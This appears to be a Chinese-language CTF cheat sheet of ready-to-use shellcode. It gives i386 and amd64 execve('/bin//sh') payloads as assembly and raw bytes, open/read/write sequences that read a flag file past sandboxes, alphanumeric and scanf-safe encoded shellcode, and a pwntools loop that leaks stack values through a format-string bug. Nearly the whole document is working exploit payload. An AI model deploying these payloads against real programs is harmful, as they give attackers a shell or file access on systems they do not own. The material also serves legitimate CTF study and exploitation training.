最短shellcode

i386，长度 18 字节

; i386 Linux: execve("/bin//sh", argv, envp) through int 0x80 in 18 bytes.
; Register assumptions, not established by this code (verify at the entry point):
;   ebx is expected to hold 0, because `push ebx` is what supplies the NUL
;   terminator of the path string; ecx (argv) and edx (envp) are left as found.
push   0xb                              ; eax = 11 (__NR_execve) via push/pop; shorter than mov eax, 0xb
pop eax
push ebx                                ; 4 bytes after the path; a terminator only if ebx == 0
push 0x68732f2f                         ; "//sh"
push 0x6e69622f                         ; "/bin"  -> stack holds "/bin//sh"
mov ebx,esp                             ; ebx = pointer to the path
int 0x80                                ; invoke the syscall

amd64，长度 22 字节

; amd64 Linux: execve("/bin//sh", NULL, envp) through syscall in 22 bytes.
; Register assumptions, not established by this code (verify at the entry point):
;   bits 8..63 of rax must already be 0, since only `al` is written below;
;   rdx is derived from eax by cdq, so bit 31 of eax must be clear for envp == NULL.
xor 	rsi,	rsi			; rsi = 0 -> argv = NULL
push rsi                                ; 8 zero bytes: NUL terminator for the path
mov rdi, 0x68732f2f6e69622f             ; "/bin//sh" in little-endian byte order
push rdi
push rsp                                ; rdi = rsp = pointer to the path
pop rdi
mov al, 59                              ; rax = 59 (__NR_execve); low byte only
cdq                                     ; edx = sign of eax = 0 -> envp = NULL (rdx upper half cleared too)
syscall

沙盒下最短shellcode

64位

# amd64 open/read/write ("orw") sequence for a sandbox that does not allow execve:
#   open("./flag", 0) -> read(fd, buf, 0x100) -> write(1, buf, 0x100).
# The inline notes inside the string are part of the literal and left untouched;
# corrections to them: 0x67616c662f2e is "./flag" little-endian (0x2e 0x2f 'f' 'l' 'a' 'g'),
# and the two zero high bytes of the 8-byte push act as the terminator; the read fd is
# the value open() returned in rax (moved into rdi), not a fixed 3 and not stdin; the
# write length is the 0x100 still held in rdx, not 0x30.  No exit follows the last
# syscall, so control falls through into whatever bytes come next.
shellcode='''
xor rax, rax #xor rax,rax是对rax的清零运算操作
xor rdi, rdi #清空rdi寄存器的值
xor rsi, rsi #清空rsi寄存器的值
xor rdx, rdx
mov rax, 2 #open调用号为2
mov rdi, 0x67616c662f2e #为galf/.为./flag的相反 0x67616c662f2e为/flag的ASCII码的十六进制
push rdi
mov rdi, rsp
syscall #系统调用前,linux在eax寄存器里写入子功能号,断止处理程序根据eax寄存器的值来判断用户进程申请哪类系统调用。

mov rdx, 0x100 #sys_read(3,file,0x100)
mov rsi, rdi
mov rdi, rax
mov rax, 0 #read调用号为0,0为文件描述符,即外部输入,例如键盘
syscall

mov rdi, 1 #sys_write(1,file,0x30)
mov rax, 1 #write调用号为1,1为文件描述符,指的是屏幕
syscall

'''

32位

# i386 open/read/write ("orw") sequence for a sandbox that does not allow execve.
# The path is built without NUL bytes in the instruction stream: push 0x1010101 and
# xor [esp] with 0x1016660 leaves 0x00006761 ("ag\0\0"); the next push adds
# 0x6c662f2e ("./fl"), so esp points at "./flag\0\0".  ecx = 0 -> O_RDONLY.
# The inline comments say 0x100 for read/write, but edx is set to 0x30, so only 0x30
# bytes are read and written; ecx (buf) and edx (len) are reused unchanged by write.
# No exit follows the last int 0x80.
shellcode = """
/*open(./flag)*/
push 0x1010101
xor dword ptr [esp], 0x1016660
push 0x6c662f2e
mov eax,0x5
mov ebx,esp
xor ecx,ecx
int 0x80
/*read(fd,buf,0x100)*/
mov ebx,eax
mov ecx,esp
mov edx,0x30
mov eax,0x3
int 0x80
/*write(1,buf,0x100)*/
mov ebx,0x1
mov eax,0x4
int 0x80
"""

32位

# Raw 18-byte form of the i386 execve("/bin//sh") listing that follows (same instructions, assembled).
b'j\x0bXSh//shh/bin\x89\xe3\xcd\x80'
; i386 Linux: execve("/bin//sh", argv, envp) through int 0x80 in 18 bytes.
; Register assumptions, not established by this code (verify at the entry point):
;   ebx is expected to hold 0, because `push ebx` is what supplies the NUL
;   terminator of the path string; ecx (argv) and edx (envp) are left as found.
push   0xb                              ; eax = 11 (__NR_execve) via push/pop; shorter than mov eax, 0xb
pop eax
push ebx                                ; 4 bytes after the path; a terminator only if ebx == 0
push 0x68732f2f                         ; "//sh"
push 0x6e69622f                         ; "/bin"  -> stack holds "/bin//sh"
mov ebx,esp                             ; ebx = pointer to the path
int 0x80                                ; invoke the syscall

64位

# Raw 22-byte form of the amd64 execve("/bin//sh") listing that follows (same instructions, assembled).
b'H1\xf6VH\xbf/bin//shWT_\xb0;\x99\x0f\x05'
; amd64 Linux: execve("/bin//sh", NULL, envp) through syscall in 22 bytes.
; Register assumptions, not established by this code (verify at the entry point):
;   bits 8..63 of rax must already be 0, since only `al` is written below;
;   rdx is derived from eax by cdq, so bit 31 of eax must be clear for envp == NULL.
xor 	rsi,	rsi			; rsi = 0 -> argv = NULL
push rsi                                ; 8 zero bytes: NUL terminator for the path
mov rdi, 0x68732f2f6e69622f             ; "/bin//sh" in little-endian byte order
push rdi
push rsp                                ; rdi = rsp = pointer to the path
pop rdi
mov al, 59                              ; rax = 59 (__NR_execve); low byte only
cdq                                     ; edx = sign of eax = 0 -> envp = NULL (rdx upper half cleared too)
syscall

32位 短字节shellcode –> 21字节

\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

32位 纯ascii字符shellcode

PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

32位 scanf可读取的shellcode

\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

64位 scanf可读取的shellcode 22字节

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

64位 较短的shellcode 23字节

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

64位 纯ascii字符shellcode

Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

格式化字符串（fmt）查看栈神器

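# Walk the stack through a format string: for each positional index i, send
# "AAAA.%i$p!" and keep the pointer-sized word printed between the marker and "!".
# The loop body below was pasted without indentation (an IndentationError as written);
# it is restored here.  Assumes `p` (a pwntools tube), `stack` (a list) and `sleep`
# are defined earlier in the script -- not visible in this excerpt.
for i in range(1, 30):
    payload1 = b'AAAA.%' + str(i).encode() + b'$p!'
    p.sendlineafter("3.Buf overflow", b'1')   # menu choice that precedes the input prompt
    sleep(0.1)                                # give the target time to emit the prompt
    p.sendline(payload1)
    # [6:-1] drops the echoed "AAAA." prefix plus one byte and the trailing "!";
    # the exact offset depends on what the target echoes -- adjust if the prefix differs.
    t = p.recvuntil('!')[6:-1]
    stack.append(t)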